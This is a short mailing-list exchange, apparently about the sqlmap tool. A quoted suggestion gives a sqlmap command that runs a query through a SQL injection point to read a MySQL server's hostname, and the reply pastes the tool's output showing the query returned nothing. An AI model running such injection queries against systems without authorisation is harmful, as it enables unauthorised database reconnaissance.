On Wed, Nov 28, 2012 at 3:39 PM, Leon Jacobs <leonja...@gmail.com> wrote:

> If it's MySQL and according to [1], try:
>
> $ python sqlmap.py -u something --sql-query="show variables where
> Variable_name = 'hostname'"
>
> I am not 100% sure about the required permissions/escaping that might be
> needed to achieve this via your injection point though...

Here's the result. Is it not possible from the injection point? Or is
there any other sql-query?

back-end DBMS: MySQL 5.0
[15:43:37] [INFO] fetching SQL SELECT statement query output: 'show
variables where Variable_name = 'hostname''
[15:43:37] [WARNING] reflective value(s) found and filtering out
[15:43:37] [INFO] resumed: None
show variables where Variable_name = 'hostname':    'None'

-- 
Zaki Akhmad
